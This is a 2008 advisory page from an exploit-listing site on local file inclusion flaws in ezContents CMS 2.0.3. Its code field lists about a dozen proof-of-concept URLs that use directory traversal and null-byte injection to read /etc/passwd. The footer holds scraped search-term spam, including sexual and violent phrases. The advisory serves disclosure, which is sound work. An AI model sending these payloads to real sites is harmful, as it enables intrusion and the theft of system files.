exploits , vulnerabilities , articles , ezContents CMS Multiple Local File Include Vulnerabilities
| Title |
ezContents CMS Multiple Local File Include Vulnerabilities |
| Published |
2008-08-25-12:00AM |
| Updated |
2008-08-28-10:04PM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
DSecRG |
| Vulnerable |
VisualShapers ezContents 2.0.3
|
| Not Vulnerable |
|
| Code |
Attackers can exploit these issues using a browser.The following proof-of-concept URIs are available:http://www.example.com/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/ http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00 |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sun, 23 Nov 2008 08:48:56 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cisci trisha t906t mambo Remo AMERICAN S miley cyru /search/ex t408t WWW.3PICS. rape scene Www.tamila t949t asian scho Coyote South+indi Searching Pics of ka phpBB WWW.nayant Wallpapers videos gra www89com+ components asian scho www.toysex phpBB por pic fat se dy.xfkyw.c free downl WWW.TOLLYW mambo Remo mambo Remo Network+As www.bbw.co exploit 20 Phonoretic http secur www.aishwa mambo Remo CMS is Fre Www.Sexy videosexyf 04-022 IceWarp We download s trishabath SEXYVIDEO mambo Remo Walpears.c Teachersse
|